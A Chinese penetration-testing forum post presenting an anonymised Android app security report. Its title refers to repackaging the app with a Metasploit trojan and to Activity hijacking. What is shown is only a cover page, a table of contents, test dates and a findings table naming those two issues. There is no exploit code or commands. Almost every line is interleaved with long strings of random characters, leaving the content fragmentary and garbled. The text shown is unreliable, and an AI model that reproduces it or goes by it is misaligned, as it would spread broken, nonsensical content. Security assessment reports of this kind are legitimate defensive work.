找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 5224|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
4 c& c. E- Q% G4 W1 |9 P / a* w5 R/ g5 v* e p0 @. d

: T5 g( ~( n3 f. q2 b/ y / q7 t% m$ F, f' a7 t* G
5 _' r. t) ~8 m) W0 }0 {: n( z $ S- z9 }* w% K* Y$ t$ W: S

- a* k% ^$ p- k# y2 G 5 \8 f6 s* z r7 t
: g2 T+ a6 G0 | f1 g+ A ) y( s2 [6 T0 J) @

4 k# Q- W1 C3 z" n" B! Z# p5 H5 \8 {) ~5 v P9 V 文档编号:                3 F% P' D9 j" x) [; N# _- g: h9 D* b4 D; [) @( T1 Z- l, g

* }6 f5 ?0 Y( E& f2 B. W/ n + ?9 T3 {/ f5 w; }

7 G/ s- c; n. n- R1 ^6 M; ~% h! h5 u' D* r V% O   ^# [# n! ^. F) O; ~) \4 _- ~) R 6 P, o+ n' @7 h5 n ~& Q

6 d3 U1 m$ n; w6 f3 d) E0 | : X/ ^3 Y/ `$ m7 p3 }& J7 h/ _# C" ]

3 ?; j$ O. s2 d) O2 z; u3 U$ M 3 K' T0 ~- |2 n; F+ h8 T, X) z: n; W   4 L2 c: s" V, [% {. S1 d! y! {7 v% ^. R! p5 }3 i) J

# p, w# m1 r! D8 {3 f 0 W# s) G! d" j6 E% T

' h- o8 l% l7 D- g O) m! W" S, F. z6 j   $ Z' i* U# E2 C' C; W- o, X" X1 O1 q

6 p8 t+ e$ n1 G/ ~, f # R t5 g: a" i& ?3 f

# ]# c' C9 L2 ^+ F9 S6 G* z7 A 6 l8 n X: e2 k; G' f% q; U/ v   : `, C2 H: [3 A" g3 w. |( d/ | $ H! B, y0 \7 e! w7 M( z& Q0 H# P

2 j$ _2 m3 `* ]- M' }* M ' I2 O# y- o, k5 d

+ a4 z0 J% M# Z! X: V$ {1 X# L R0 Q, B! p   Z. {# [$ V; f7 |# f t ; L" T( |$ Z' Q# Q

5 J! Z- [5 o, W3 I : d6 s" r; Q7 O$ J3 m/ p

. c, B4 b* B+ F . c+ X) E' G- x4 N 某某某APP渗透测试 ' ] ^0 x, o* m% \$ V1 d# T$ S t0 ^8 s# V. y

( [# `( _1 {; R6 f0 Y9 S$ d1 u3 k2 f# a9 E; T2 @( A

3 z" k& v- h( o9 w0 |5 p$ C4 ?3 ?9 R   + T, I- e. v P7 Q * B7 ` @8 W9 a0 U+ j

$ g, ?9 I7 U4 {- D% Z + }5 V8 P) X& u7 B# j

3 B& ?/ |! N5 x * k# V" w0 G& f% z) Y# B   3 |! x* v6 _3 I& M* ~2 v+ N. N- v; ^ ' t: {2 N2 \1 C3 ^7 \/ m: a

) w9 K, k* V, v1 q: q. J, A5 Z/ z& d3 K

8 c( S/ {- ], c/ S* O) @$ U) \; F4 h   $ Y% z2 J8 o- T+ H4 c% N & D! Y5 Z8 `% ^* f4 i: f0 h

O0 y1 ~; H1 c" P& J) X+ r' _8 @ |- J8 D9 T/ w( U x' ?- t

, N7 w9 t. Z n ; Y6 x2 b( J0 o+ p   $ r* u' x3 q( G9 ?% l# k v t) T" w2 [* y, l

1 t3 W% e9 T7 d0 G: g1 ] / b" C! K" N/ Y9 x1 \

; s8 z9 I* o) r " r, F/ v5 n7 {7 Z 技 术 报 告 1 [8 I% b% B: C/ Y7 s; M) j( q , M. Q! h: G: t; F

% L- ~' C# m/ \0 [6 W |' W0 l$ r* F7 h( F3 M

# A, y; ^* t' h+ C4 g1 l. h & E; g- h% D* @0 b x   x0 `5 G$ F2 q. C6 t / d# | o5 ?6 n

# {' V; i( u+ E0 V8 n6 l! q i6 g0 J; U/ g+ |/ G3 z7 a' x8 S

6 J0 d; }+ H. f7 F# P7 H* p$ ^ 2 ]# l, w, E/ c; l" E* d   2 d- i" J' c" M, u% f( o& x5 S * ~4 e: r1 X0 c2 I' M

& | O2 m( ` a7 n, t ; F: p" \! E1 y/ H; Q8 p2 {: ]

* P, X$ S! H4 T7 M' U 5 O1 b9 ]* S/ r) A) ^. y   ( u7 w* T3 d: Q! m# Y, h/ _ 8 E3 Z' u2 _) x$ f

9 F2 m# D. Z) [1 J7 |# C 0 i2 u. b: e: S3 ~) o2 }8 h1 b

1 e3 \# Q; O7 l7 ~( N: } ' l6 u: V5 t! J7 N7 k; A   4 r+ f) e4 d9 \1 j, F6 t- T. t 2 N5 x) t X& v* ~8 I' ]% Q

/ m$ J& u- R/ O4 @9 b V3 F, U. Y! ] ; K6 U5 M( u+ h2 [6 z" A7 O

' @3 q/ Y/ C( h6 J 8 G+ s) ]$ }% G a2 K% d   ! i4 A; S$ }' K" k# P& | * L% f- T0 z7 |3 q! z4 O: m

$ G; ]' F/ {' I. \: U* \ 8 E% N3 F3 W5 u: K% g3 |3 T

2 q. }6 N( o7 b5 x# v0 h& j; d9 G   ; i+ _0 }* M9 }2 R! N N" o6 U5 h9 M6 g ; D0 V6 x! U- I' a

" \! W7 E1 s2 I0 e) [0 _" `# S$ e+ p 7 q% w. c; \7 s' N6 c! B

+ E3 q; b: n `" Y1 n; t0 t+ V- V 6 q/ J* M) V7 }: E2 O3 ?/ `   r1 l7 z X$ a& u% H$ a ) [: B% P9 a. f* U) H

0 i. _0 Q. b! p9 _6 U; w 9 f# Q8 A" z' }8 P; y/ Q% @7 s# ?

# J" X, ]# X% U3 } 6 ]* [. F6 Y) K8 a   / Y b5 L* y5 g3 N 0 d) S+ C# L; q+ T; |

7 E# y, H" J7 I6 U1 ^6 U0 X/ g- o a+ v! x, |1 n

! {. `. f' C z |' U- o8 X5 n9 j* R 7 h' W' w7 \! y/ B8 X3 G7 q* _, q3 l   & {$ a5 O" {4 Q' f, z o9 E0 N3 ]3 C9 u, d) }, T5 {

, U; @8 A, }7 @ 9 D$ v$ w5 W+ X, c6 y

4 |4 c+ C- s" _% S; N8 F) l & f6 |2 Z. l5 @ p1 y   F( i0 e- z" ?- X6 I, m) i! K! h 2 E$ _- M5 K7 o0 t9 J4 b

. T+ L8 Y: H# k& E, O6 {5 G. H n4 [0 S, C

Z8 _0 M- |* ~/ S. l' |" v1 P$ f/ g' t: ~' ?: _# e   " g6 f9 G' @" _/ n6 r6 H- t z; T % {; _+ c: K7 _, f

+ G. d- o+ O5 |3 P3 N' l $ h2 g0 x/ v- m- i* l- d

: O( B. h8 M3 K! c 1 H, c& O! V6 o1 l   0 S1 K9 ]1 k4 [9 ]5 E: F; I; k * r/ s8 v( E! g7 F; e

8 I+ q- p- _+ q! ], P- h9 T) q+ J9 D4 S

S3 H- [' n9 J! {$ K 7 h& A9 h2 }( O$ p2 @; Q0 t   . P( e# R6 p' i# { 2 X' k! p' g/ O/ g

& F" d: S( s y1 d) t" j( l: O 1 I& b3 R! q( C4 m( Q$ {

4 V0 `5 W/ p: x. r, E4 R ! P9 D0 w0 K3 K7 ~, C   * Q/ J, r- K9 _! C# l6 g& G- k& D; M " |' e& o' \, |. l

# ]/ z3 ~ e8 `% v, T" u; m, b 8 [0 E& |2 g) Z3 F& Q

! S/ I, _& s; Q' n- P# P/ U 0 `) f% ?. }$ f0 a   M* ~9 ^6 F _+ K3 G5 d7 n# U ; G. l" U! G5 v6 v6 h, g

$ K# Q6 a5 ~0 M; b( [6 Y 7 @' Y% R% J2 i, h" n

3 E, V. c Q1 k1 t% u, U6 F5 G . x5 F1 X8 ]/ U% }3 R. w% F! L   : f- X) W, L; [ K: i$ u 0 M, b# E. d% H7 N& t+ f- V

& ^+ a W/ u1 X" h0 C5 u 9 R8 P2 D2 b( T2 h- \

' p$ ?& [7 o" X& I& p- ?( W 8 r( B7 d% G4 C; _! K. R F6 S   1 N; y4 i, u5 d6 ?- f. [) M6 A0 \' J4 i# v7 b( m

6 z" W \* \* y4 V- S& s+ L % J7 A2 R( t: ?( v

* ]0 A. |/ h1 \8 z) Q8 ?" l0 q " B1 R) p+ u/ K' x7 {   ?; J: k; t8 o5 N M- k, z' ]8 |# ]( h3 e# F( {, [

3 H e+ @( l" C9 g4 k2 x( R. `" j0 ? 1 L- J" }$ u/ E0 m/ B

, J' `; R/ }2 j) B0 o) _ M& R+ k1 c, N7 U8 |8 U! E 二〇二〇年 ) Q( b$ b* W2 V ; \- |' H5 ]* j- q2 J$ a5 [; ]

9 m* ]: u2 W. k7 o- X2 k' J! ?- j% b2 {6 T& v
( t( W8 N+ v7 A) b1 \3 p+ d2 ^7 C) u ; g2 R m } k5 F
8 b# d4 A( K: d7 D( ~0 E# R1 m8 W & O; n; F* |& n) T* _1 _ 6 d4 K* D, s. @4 W/ N8 ^ $ ]$ p6 j* t( w# E. U
$ A- W+ k: S! [: m8 H9 u* }' J, u( R, A ; y% X9 y8 z1 B4 k3 T
4 }4 J- S$ R2 V, O" |, [( b / P' T/ y8 o5 t/ K/ w8 o( m
1 `* w, n! ~' v( N3 G% i , Q6 v: N: S& q& L |8 s1 x9 S# ?$ R ; }! X, U" ~7 ^( R
: j! l5 ^1 z+ c) E 3 {. t; g) Q( M% w% _

+ q, f1 V" v- m1 `* |3 t ! u7 j r" h: X5 f+ B0 m( |! n 目 录 ; Y- E3 d( w+ a1 j Z/ q& f5 i# Z1 ]5 I3 h: V' I7 X

. }$ ]( d7 F" d" N- H9 y6 X- M1 L7 `+ x( O5 V+ l" n& v, w 9 U( i, i2 y9 [' _ $ F' F& l* w; ~3 e3 m' r

4 I! s- u( v, k: S- E- o ) E+ Y$ ~# y6 ]! U/ `! z0 G2 E   ) S( O5 X- ~& m- }+ y0 q1 I! E / ]) I& @4 \( K) ]$ i P) N5 j8 i; Q

3 b7 v' P; J, R- ~ ( B8 P7 N+ V3 P4 n6 q

; m* i8 N: }* m8 J7 F4 V' W6 l& L! s . ^9 y0 {: u, |/ z/ H5 [8 I- H% `4 }8 j 1 概述... 3 U' f0 R8 t; F4 |5 B+ f* R - [9 v3 [- i& E6 ?

) [- g- }) B6 m+ K, t2 {6 }3 z ' @9 ~; [8 f6 ? u5 |! z$ K

y5 I8 r( h) O3 s 5 Y: r; ^2 y5 u0 D5 b9 e 1.2测试时间... 3 5 m, N9 d+ l; n& j4 J 6 i7 H2 n) i1 y

2 R& `6 b( _$ |% M * W, @7 C" Y( @6 ^$ k; C6 t4 k9 k

; F6 ^' a2 I# H 9 |3 F5 N/ @, l! N, q1 {: W1 Q, s 1.3测试对象... 3 7 M- j9 y! [! m- H% o2 e B2 ]6 ?

$ R9 Y; p8 J& [; U- Y) Y # t2 h2 R& B* `* Z( j5 F

1 Q: n$ q- Z8 d7 E& I 8 w/ r* _3 r& c/ f8 V# f 1.4测试结果... 3 2 t3 A: W: z+ E7 \- x. g 6 I. I# S: E$ I ?1 y; e' a! r

: W+ ~; ^6 F& L$ F9 H& q" `; H+ H! |$ t( I; r9 j8 b1 o) u

1 j, F' u9 p4 ^/ {( G- V' w1 G% B$ ~, ~+ H5 | 2 检测结果... 4 5 Q, z# }" U3 ]8 q( d0 J9 } . `% X& S/ U' ~

+ U3 T# B# W8 Q& X5 t, u 1 |! |! v( }& [; S7 m' E8 I3 a G

' U+ ^4 j) M; u8 b , |! S8 s ^$ V 2.1 某某某... 4 ) C0 o. J, j' _) w" T# y8 ]% d, M) `2 F9 O# f

1 T3 Q( O. d3 D$ o( Q2 f3 e7 S6 I/ v 9 g# a1 {+ ]; _5 `6 Y" Q

. t' m3 m2 q/ g# `, j9 b X% K & v0 k) B9 t' T/ @& `: { 2.1.1检测目标... 4 # o! t' M! h/ b# c$ Q7 A' p: A6 {4 U

8 y) _: y% s; `& F" n; [# U" ?3 Z( }& V8 ~/ c$ U% K

! U" n! b3 k8 \8 E2 C. ^( t # S+ `! Q3 P D p1 I 2.1.2检测结果... 4 7 F1 K4 j; H" k+ C6 `! ` : k( j5 y" v! Z8 n- R+ q

/ u( r+ i# b7 B! U : w E: e6 a$ ~6 N3 b2 \3 e

; p! g1 v* T9 F$ @4 n 2 ~3 r6 n/ c9 r7 X5 ~ 2.1.2.1. 4 ) Z3 ~$ T' \( [' q. I% K % s9 { O3 p. W- H

( e& G3 a# h* Q$ `# [ 7 b) j' {% a# z8 d

$ L6 c6 U' W: X* [0 M : V: a. n; ?" t% I 2.1.2.2. 6 $ B: {4 Q# T ?7 a/ ~ 3 X* p; t4 w: l Z, M' o

- w1 z" u! Y; q1 m/ c . n" m6 O: U, s

y+ D i& M3 v5 x& H' l+ B : O# o: o3 q3 d& ~% ?3 I! w# I% l : Y W) Q' R9 Z+ I% |0 U% } ' i/ O& n9 f- c

; v: i: c, s% |& o3 I# e0 @ u, b! @! ?2 ^( k3 _0 A- J5 i# K w% J" i) M% A2 S5 P + X. Y( P( U" m0 Q
1 A5 y4 g u3 y$ ^; H % S# B, {, F3 u+ u' T
" u$ \/ G. x) }& @! E$ J1 f9 m U' W& K( L2 ]6 o# [) T( w3 P1 n - C# O9 H) B% f; Y) J: v/ i& c' e, Q- `. F8 f4 r- C

, @8 O/ o6 k8 V! v# T3 Y, r ( s( n1 N: w9 B$ g+ l: W 1 概述 * J' R! k) U9 `; R( {: p 6 X7 U4 |' }1 n- e- T/ D' N( v

% C2 ^$ `1 Q7 T! I/ F& n' F* R6 y/ q

' a/ w# ?* C5 i" ?6 G; s4 Z2 l+ m& R& U2 I( S0 F 1.2测试时间 : T9 V U# c( L2 @- W1 t. a4 O4 w5 M$ C* Z/ d+ G! P

. x7 b K- D8 S1 i+ b$ l6 |9 F2 e" i2 o8 R- t / p: f5 u3 U" i$ ]6 L2 |8 P) V, J5 s. T5 D9 f( J. R* g- N, J, R, @" k& i3 h1 ]; }$ N- ~ z0 K$ K+ I+ V0 C, q# g( i$ W: Z. Y; c# F. j+ n, D" M- P1 z M4 x G, O8 ^) n4 t/ ?6 q! B, R/ t4 X, e' e y1 C$ L2 [9 h4 Y# r7 p! j, V! w! J4 {1 W: C$ ]5 l3 Q1 n- i1 q/ M5 h5 C, `/ y5 P, F1 d- y3 F/ X4 c' c) g$ }6 C/ m6 z/ y' t1 v: F' o) w% W6 P" m9 m, z, u4 }% s+ D7 o+ b% \* e: P- n% p, C! q& ~: v" K' r2 A7 R( \ o2 _: u" G( R, S9 U$ ]5 _$ v( h* x _' u6 y0 _0 t6 X2 ?. W: t: f' n) q( o1 c: T1 i1 f8 H" x0 @$ ~# q! G* ?+ @7 K( m5 H& O6 _4 s) p8 u" d8 \( }- E7 z1 V3 a+ O+ O1 _2 P" J, w$ W4 p& ~1 ~* V7 g; `+ i0 d9 ]. ~8 W! u) Q- ]( [& P- u( P! r3 N Z8 E8 v/ w" e' @7 }; f$ O) Z7 {; X) V3 ^' X. Y/ A& C5 O' N6 A
. x$ p2 J# E& T+ y, X , N& W: `5 ?& u. m- {3 m. }) T6 [7 S

& s3 y; B( P& q2 j! u$ b8 y, Q6 u5 r S# z" l 渗透测试时间 / H% L, B/ @) e/ _9 o - A* ^0 O/ V8 L6 e! T3 r m

; s# O, F5 v9 D" {" Q7 N 0 A7 i8 B2 Y! G) V! X8 J: v
: M1 H( c, ^' @/ g$ e1 m M+ ]3 r3 i* g/ W

/ |# h' U( a7 T, y5 Q ; G2 x6 J) Y- E& {$ M- z 起始时间 / @9 R+ I3 o7 B! _# w ^' C9 J+ ~+ J, d # b4 |7 {" x: b

/ U. l- t; Q6 K# A: Z6 w $ [5 j/ D% x5 d1 P# Q& G5 Z 		+ N' M) Q( {! H8 [ \/ A k% {" q/ i4 T g

% i. e, s" ]# O' c 1 d5 b9 q; H0 W& _: N 202046 ; d8 Y2 e$ R8 l7 B% g( ^8 y 8 K, H5 h7 z+ |( z9 Q! K

& j" L' h+ M8 X" ^ . V9 U6 r1 O( w" L
! N" N$ g! L+ H q+ |+ b6 H 4 z8 V; k. |3 H* j

, D! n. i, J0 R, P- K7 o# T# S 结束时间 / X1 }2 T) E2 o# V, a _6 t2 W; [; m

. |& C3 c0 q, R- K) L 7 ~! T. B# v. q e; D3 ` 		& p4 e. V7 T) k# | 2 a, D2 E3 k* }" i7 | w2 [

& i& o2 g2 g; @0 V' P" N d, {/ i7 W# @' \! B" \6 W4 d 202049 ( s1 Y' K: ?6 x: r # J+ e1 R6 w( F, I4 I. p+ l S: g) c

2 V& H5 w+ h9 x; V0 `2 d" m! V5 \ 7 m4 W. S0 ]6 P6 ?% n" D2 K
( D: j4 u+ u. `; n. S9 m * d$ [: t# {* P+ P! X

8 j/ D [& |' `6 \, C # r' y* M; t; T* }: Q" j 1.3测试对象 - s1 E. w9 X; X' q, Y/ O) e! t) D5 F7 g

- r# n5 C" B: H% V/ t - C `3 d: X* ]* I% A

& ]3 X1 x+ w& T$ C4 F. a 6 h" t, f% p$ Z! @ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: , a: [& Q; M- G 2 N: F3 n- R2 c0 Z. `6 Y

! h: `. N6 l: ~ % p* h! O2 D% I4 J. C

1 _- [3 t' X. u; d4 X 9 ^5 ?/ {, K5 J l 1-1 检测对象 ) q6 |2 p$ J+ n+ K* n% a 4 v% x, t. b% {3 ?& d0 t- n

0 V# d0 C/ {2 E1 ]: Q) _+ R) m9 v$ K2 O ! `1 k/ R' w5 K 8 [( t6 F1 }- q( ]( j& e" Q9 G! b0 \: o2 K( T+ x+ c9 ~4 O6 _& \. D9 E; ]0 j! m9 v. k9 G* q) L. k. s3 x) N- k7 F; R1 U& w% E3 N# C1 _" Q! R7 c& ? l# A1 K5 N6 D" _% t: Z; \ D. T9 n; P) b+ v. U) t. _6 f: M. S- W' d6 [6 H9 y: Z$ c, @* R% c+ o9 |# q- X. y- c, d1 Z4 O3 w. d* }1 j! w, D/ ^5 Z# n- @. x) `( w6 [( {0 M( z, A6 {4 ]" h' r3 q' W$ A5 j- l% I6 A1 \* p& A B4 H! \ ^7 a a& o% ^, t7 q5 F( A7 P1 w1 o) y8 \3 R E2 }' @- W8 h/ ?) d0 b" b/ a- Z' c8 z9 Y T' J! G: }: |, R/ b: U) q- E9 c9 O& e! J( j+ R% N5 o6 u2 x) y" c, H# P4 O& H) W4 J/ Q. u/ S7 i P r+ [" j6 y9 c" o+ s5 q8 H7 w: W* V3 @7 C+ N, g& {" z/ [! ~) D4 q0 |2 h# ^, W s d; d4 a' V W( b7 j! d) {$ v" _3 E; W9 \' j& A3 \0 u/ H( L& L, p" ]/ O( j
) A8 j6 F4 t" f9 ~: `7 ^ 7 G' ^) v- O( J

! O9 f/ ^2 D. k1 L8 s5 m 0 F1 v. N" n4 O 序号 z& v; g( Q _0 p 8 M( r8 [ S3 ]% `- `

7 L1 G/ g+ N& h3 K; f2 M: j' I( P0 m/ y& p 		3 x$ Y5 U2 `# i ?# d- Q* d% Z8 {8 D7 |

1 k9 R- \/ j4 ]1 B7 ~7 {$ ]$ d+ D4 N1 V- i/ R4 H5 U8 a 测试对象 " N- u- |, ]& {. o Q" i/ i, T2 ~5 t: ~$ m

( }5 w/ G9 H) E+ z l& s0 | 3 d1 L' Y, Q- o' s" [: G) o 		$ o5 Z* [; D+ u2 m& f m 5 i' ?/ Y$ z2 L8 G

- i0 l% A8 \# ^: _6 s, P0 J" b * D. J, Y% c$ n% a 测试地址 W- H4 y7 k7 [ c- U 8 ~( [% @ c- Y

( {/ A% {! R2 D* r$ B! r, g: q% r5 X' d- n) C: A# }8 c 		s( _' m9 e* z. ~& x- p$ K; |8 }$ e+ f0 x! e

: b/ e8 ^4 z: q9 J5 g! l0 n7 H( N! { 4 A$ t7 S6 w1 @! ]7 b 安全漏洞 ! j0 J, y+ s u # b6 P+ q# E! j6 L; v+ c/ e

" Q: p9 }: r0 O9 s! p) i: w # W% e. M ~$ v' v
' b/ `. g" l/ u) E( F( o 0 W: N* q4 S- P+ B

- a) d: I2 ^- ~# b 0 W$ _5 B3 v3 v* d0 E0 s 1 / t6 G+ i% X& X/ ~- C: H" j3 M( | 7 B$ a* e4 g& @; d

( N& v% ~3 B: r9 E" ~- \# f8 m F" r* l; N/ L0 } 		/ C5 J1 T: t2 B3 \% t) H1 L. K- \

+ X7 e& Z3 S* l. y% ^+ R : l. \1 i9 M1 B+ I" G: c 某某某安卓APP 2 @3 ^' V# I, k8 C0 X ) p3 G5 g% f9 y

' U) d' c/ Y0 d1 R! N, Y. P9 l* v+ _8 g% T/ @ 		, ]3 U# o2 \9 P- k ' C! H! T. q1 P6 y

) r9 L9 N' G' v: \9 Y 3 V9 N5 f4 f+ Y: u, h+ }0 S4 P8 K# S   % X0 K+ _8 F4 U/ G6 l $ H, s( h, Y* `

( b# P" H" f( O3 b* j0 q# Z/ f. q6 }& O) Q$ }8 { 		7 E1 |0 D0 a6 i5 Z& T ; s) o7 @% q5 z' W- [" c$ T i

% f u( |2 H$ b* c ! V3 k) X2 q, L6 T/ w" c 2 % i; j4 j7 ?' R5 J6 p" f 0 j# E4 U! Q6 @! ]

( W8 R8 b* X! M) U- M% J : ^( W4 J" C; o( ?/ X# M9 \6 _ P& c
' ]* W% S f E; h8 R$ I 8 J& A: B4 i1 B

8 J7 t: ?" N6 u/ W 3 j6 q$ g. E0 e# M; H 1.4测试结果 ( G/ G- Z M3 v+ t! W 3 k/ ]" d/ B7 F3 Y0 @ j

& ~9 K2 g& w& ] : ^) a2 A0 m5 p

7 t: U2 M" o7 A% P4 | # l" a1 I* z( ? ^7 F0 D 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: $ f! q, @9 Q7 ]) g$ T 9 Y6 d9 |4 W0 Z/ S( R

4 N% H5 j& {0 t% \1 b# Y2 Y! x: S2 G; Y! K: E. ~* J8 ^* D8 E

+ b- u) Y- K& D# w2 q0 W- L' ?6 m8 ~ 7 n, \- A# N, U" l   ! L: r, u+ f) x X4 V9 Z , H" P" @$ c0 t' P9 ^( B

. ?: M. e, N2 C& V) B4 t( R/ @" D. n
" d3 [4 B' Y* Y& p8 h 5 f$ A: [& d: A6 [ 8 D, j: }; u( O+ s& h( R ` Z p: V$ ]3 |! x" R6 O' V) i( p' c/ Q! S! ~# d" n/ J, R# d+ V8 \9 l1 Y! |! P4 R/ W2 e- V4 i7 h& Q T- q5 V7 T, m" S4 H& L& B* q6 }' W" n/ D" J- e' F! V4 y7 j4 c& s7 N: s4 X. q& |/ ~- s9 a2 w0 Y* {1 Z) X/ p& Y2 x& X8 p1 A* r' p0 c1 ~7 ^7 N! E5 Y2 G) ?8 c" F: j+ n3 Y5 d3 D5 \ ]$ m- f$ r1 m W7 [. ~2 M& E& Z! X x# ~! G' g! p1 P. F+ U0 {+ M, {/ ^/ y+ N: d f7 ]5 ?4 a# A1 e6 z0 t+ f6 D9 {& _$ t0 W7 G! b' d" }# e3 Z3 i: z5 j! E* j4 `8 I e& l! u) M0 ]6 A+ B2 ?- d- r8 ^! `% v: P3 X3 K I8 {3 g; f d h7 y5 [6 o4 v4 t: `0 A$ @8 _$ e3 ~( G1 u e5 U E" d4 ]. X) U7 n" G: t; x0 l5 Q8 X# v5 m4 d( ?8 Y o. h: H: z$ ]5 b4 A) }. Q2 V. \, V; q( X! u) u0 e4 q* b7 a# g, z0 p4 H) T. K% P9 b& F" I1 \+ V: s+ V' i* V/ D; T7 u6 J8 ]1 `( |: [6 K& e' A8 t: H+ n( D) _* D! ]+ r& d6 U8 B* S# Y% d# y B. k- F/ G3 g8 j( R# _% C1 C! Z9 n- d9 Y; i. O% @' D5 J- }# K! F6 N( B0 a" M6 m. h* Q- K: K; J# r. {" D* r# k, c* X" H* G- t" }2 r* |0 ?$ O& E* y. ?- I: F, d/ ^9 y' o, m F3 c% k+ N% N* Z! ]- D7 ^* [1 L5 V$ h, p# F0 ^1 B6 j. G5 _7 k R4 |- m( d" L6 }) T; _1 y; j4 u$ [! W% k& O# ~2 x8 ~, s* L
0 A5 m+ W5 q% X0 } / ~ D8 h2 o8 Y! F# S/ s2 Q

# I- ^9 Z. W& `8 ? 0 M) E! s; B& t* w# @3 v5 j! Y 序号 , ~) @; x+ @$ t+ g: K 9 K5 n+ p% r4 j" i" T E+ {1 j

+ T; O0 }9 {1 g. r- U0 K , g+ E; T( Y6 u7 u" f( _ 		! \; E; y% @( C! S' ^9 P / j# J* q9 c; _) G% l6 x

; C' e6 f! ~6 x# g& C2 \1 I7 G 0 L, H. ?( x) |" m! ~+ C 系统名称 * I# C: O, j& \; [4 @9 b2 j & |/ \8 f2 P' I0 ]% V

3 l- |* ?: x+ ^7 v+ \8 o8 c * C/ I% d4 p; O- |6 H 		) L* b& p, O. e( I6 h8 y( u # v0 c' \. l6 b# W

* ?) T# Y6 ]8 p7 V" U" y ( D7 e; G+ M6 h! x3 h 漏洞名称 * X3 d/ |: j; Y $ Z* |& M0 M( u5 q% D

! h4 I. D* C* ]7 Z- w: c 9 S) e1 w1 S- M0 \* g$ o0 } 		V8 P. b, o1 i2 M: b7 r1 U7 I* m8 A5 _4 V! J7 X+ D; f2 ? V6 @

& G! G( d! M6 ]* O R e) C- x: X4 F! Z& F) X& F 漏洞危害 5 C. O/ K3 n! c* \) d' _" `" h! D( c' I! e, p, m( F! w

1 [% a1 k2 y, n + N$ H" K) O) y4 X+ {# P7 K1 C 		% ~1 d2 V) U$ A+ ^# B7 K% j0 J5 k5 o- c

: [5 _) f* x" c# x: y# q3 o8 x " F2 _, W& a) Z. i 修复结果 & U5 }! g* |- q0 Q6 ? ?: _# ], U: m% E" I+ w0 ^% X

! r) ]- R9 e; I* M% G1 `) {# p3 { : B. u* ]8 v; x$ w1 m) S& c1 X$ j$ S
2 Y0 m8 A. F! R% _2 s5 L& t% y& g0 S: V. ?

$ ?) [+ W) i- G3 H / _3 t5 w0 M4 Q8 Q( m 1 : v K* |6 P) \( W ( ^2 [. Y3 V5 j

) O% \ c% C" t( X + _# ~, x7 \8 p, i2 U 		- P, E% ~) B2 o: Z; X- O- Q2 V8 v - K; A3 ~, |" y3 @# P0 [, J

6 v# Q u6 W X! W9 L& m1 i $ ?& o7 o5 V1 `# ^6 c0 L% d# ~ 某某某某某某APP ) s' |0 A* J8 M- G: @- T7 w5 J" g k( ~; b# }+ P' S- X# M Q

8 z0 S+ u: c' |) i: R4 e3 z6 v p2 J- m4 _3 a' Y 		# f2 {, P/ P; j* U- V* Y7 m7 k e& ?; i$ X) P

; |+ o; ~9 E5 N9 n% [3 { ~. v$ u( e$ l $ A. H# G J1 g* v( D Activity 劫持 8 f2 o) m% X f1 [: f. d' V6 }: Y+ W! S% O# I

7 b; {! o. y5 [9 W M5 \. Z 2 D s( ~; L y. ]

) W; g7 F( a/ T0 [ . c8 j o$ a/ W5 r, j5 D4 X   + j/ H0 ]* V0 J. x G% u" p/ w; u; S, t$ h* {" f

+ q1 w/ C% Z- \5 j: A3 h- x$ ~ 3 { G+ X0 y* S$ y; M 		% m* j: v% b% f. @ # W3 N5 x3 K+ ?/ _6 M

, G: @+ r& A- P% N 5 H: t, a. l8 D6 M$ Q 2 W: j& u( G8 D$ J4 Z ( m: o4 f7 q& {0 Y/ G

! {4 y0 p* d' H9 ]$ O: F* }# O; G8 N " ^, F; c' m4 h- \- F' v8 A V' k 		* V: Q* y7 I% S2 l' O8 }+ ]& ~ ' m! _+ @* m G! p( [

# V+ Q$ ]: z$ }. v2 V+ r' h+ w . ` S( H7 q; s6 y3 e6 r: G3 O   ! F6 r; P' X4 W9 B& S / s# a3 A& K v1 O+ T

1 i' l C4 [+ z b 2 B4 Z' x1 F$ A" t
. u) M6 u4 b- G. T7 y 4 E, d. C; i( X+ T+ T& u

8 m( H* J& k$ H4 z* i$ G; _ " k5 X9 G1 v2 {8 b! C 2 * C1 _. F9 f7 W . D2 ]) I/ o3 Z! O+ d( }0 b3 D

: {- b1 f& Z% H9 a+ N6 i$ w z6 J4 |- Q# Q 		# g; f1 | P; G3 \4 x. {4 H1 Z* t$ Z. D% ?; X

. E/ I% V5 r" A5 p4 Q. n: G6 T" A; s7 f: u 某某某某某某APP , x3 j; L: N T0 t7 Q 2 Y) Q5 J k/ Q- \. m+ u# a) S

: ^& ]$ X) B3 ~! \6 J" r 6 Z* d: B k: k" h4 c/ X4 T$ M 		2 ]$ s* w7 @, s" o7 U& H R1 H4 S* x- G5 _3 s3 x

( X* s4 U9 W3 l: u/ k# N/ | 5 y( V! H8 `+ h% t- E; [% B! g5 w, | 反编译二次打包捆绑木马、篡改APP代码 9 ~9 O7 s0 N( d. W* O3 D$ i- \ # d) x( ^# K$ I/ o9 x1 w$ X' ?) ]

% v$ M$ E6 P; a: L5 i( ^ $ v# j3 B* k1 r% g6 `3 x 		- \& F. N! ~0 ?$ t8 f : b! m" `/ q" C* V1 `9 ?* ~

4 K( D! y9 \; r3 |& h- Y) g. Q2 W" v6 ^ ) O( p: E E1 H+ L" W/ k / p; n( N6 Y+ Z+ `2 F6 W8 ^& v h3 }. ?$ b- W; x1 W4 b* w

1 M2 G) ~- {& n2 C; f! @& z8 [ % d! ?, b' g9 k" T: D 		v( B, ^4 W, v6 ~3 j * V9 W( g2 Y- g9 A" c

% _9 L) N, z& V4 ]6 R 6 a4 Y# | _9 P5 E7 S3 Q) g/ n# \! y! {   6 v; l0 S0 v5 r; K- s3 T Q" f: k 7 V8 D: ?1 x; R. {6 X8 m1 Y

8 V0 C; E0 w( z) a # K0 j, o0 p/ A" S
, ~. T7 U) o6 B+ X2 C/ u 7 C L( ?& p+ Z1 u# A4 E
